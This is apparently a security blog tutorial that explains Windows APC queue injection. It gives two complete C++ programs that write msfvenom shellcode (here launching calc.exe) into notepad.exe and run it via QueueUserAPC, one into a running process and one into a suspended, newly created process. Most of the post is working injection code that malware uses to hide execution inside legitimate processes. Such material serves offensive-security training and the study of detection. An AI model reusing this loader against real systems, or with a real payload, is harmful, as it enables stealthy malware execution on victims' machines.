Each thread in a program has it’s own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen.
Alertable states include the following;
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.
Remote Thread Injection
The below code adds APC functions to threads in a foreign process by;
- Getting the process PID using the function GetProcessIdByName()
- Executing EnumerateRemoteThreads() to determine the remote thread ID’s
- Allocates heap memory in the remote process using VirtualAllocEx(), and writes shellcode to it with WriteProcessMemory.
- Finally, QueueUserAPC is called with a pointer to the allocated shellcode buffer, and the thread handle ID’s.
The method signature for QueueUserAPC is;
1 2 3 4 5 | DWORD QueueUserAPC( [in] PAPCFUNC pfnAPC, // pointer to our shellcode [in] HANDLE hThread, // target thread handle [in] ULONG_PTR dwData. // A value passed to the APC function. We can ignore this. ); |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 | #include <windows.h> #include <iostream> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <tlhelp32.h> #include <tchar.h> #include <vector> DWORD GetProcessIdByName( const TCHAR * processName) { PROCESSENTRY32 processEntry; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return 0; // Unable to create snapshot } processEntry.dwSize = sizeof (PROCESSENTRY32); if (!Process32First(hSnapshot, &processEntry)) { CloseHandle(hSnapshot); return 0; // Unable to get the first process } do { if (_tcsicmp(processEntry.szExeFile, processName) == 0) { CloseHandle(hSnapshot); return processEntry.th32ProcessID; // Found the process, return its PID } } while (Process32Next(hSnapshot, &processEntry)); CloseHandle(hSnapshot); return 0; // Process not found } // Function to get a list of threads in a remote process std::vector< DWORD > EnumerateRemoteThreads( DWORD processId) { std::vector< DWORD > threadIds; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot of threads" << std::endl; return threadIds; } THREADENTRY32 te; te.dwSize = sizeof (THREADENTRY32); if (!Thread32First(hSnapshot, &te)) { std::cerr << "Failed to get the first thread" << std::endl; CloseHandle(hSnapshot); return threadIds; } do { if (te.th32OwnerProcessID == processId) { threadIds.push_back(te.th32ThreadID); } } while (Thread32Next(hSnapshot, &te)); CloseHandle(hSnapshot); return threadIds; } int main( int argc, char * argv[]) { //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; const TCHAR * processName = _T( "notepad.exe" ); DWORD process_id = GetProcessIdByName(processName); //Get a handle to our remote process HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD (process_id)); // Allocate memory in the remote process LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); // Write our shellcode to the remote process WriteProcessMemory(process_handle, buffer, shellcode, sizeof (shellcode), NULL); std::vector< DWORD > threads = EnumerateRemoteThreads(process_id); // loop over the available threads and inject our APC functions for ( DWORD thread_id : threads) { std::cout << "Injecting into thread ID: " << thread_id << std::endl; HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, TRUE, thread_id); QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0); } return 0; } |
The above code will work, but will result in the shellcode being executed a large number of times, since we have no way of determining when the remote threads will be entering alertable state in future. We could inject into a smaller number of threads, but then we have no guarantee the code will trigger in a reasonable timeframe, if at all.
Suspended Thread Execution
To get around the problem of multiple procedures executing at once, we can start a suspended process and attached an APC queue function to it, then resume the function. On resuming the process, our code should execute once.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | #include <windows.h> #include <iostream> int main() { //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; LPSTARTUPINFOW startup_info = new STARTUPINFOW(); startup_info->cb = sizeof (STARTUPINFOW); startup_info->dwFlags = STARTF_USESHOWWINDOW; PPROCESS_INFORMATION process_info = new PROCESS_INFORMATION(); wchar_t cmd[] = L"notepad.exe\0" ; // Create suspended notepad process CreateProcess( NULL,cmd,NULL, NULL, FALSE,CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, startup_info, process_info); HANDLE process_handle = process_info->hProcess; HANDLE thread_handle = process_info->hThread; // Allocate & write memory LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(process_handle, buffer, shellcode, sizeof (shellcode), NULL); //Execute the APC QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0); //Continue the thread ResumeThread(thread_handle); CloseHandle(thread_handle); CloseHandle(process_handle); } |
In Conclusion
This post covered the basics of implementing user mode APC to execute shellcode. Interestingly, Kernel APC‘s after often implemented by EDR solutions to injecting hooking code into a monitored application.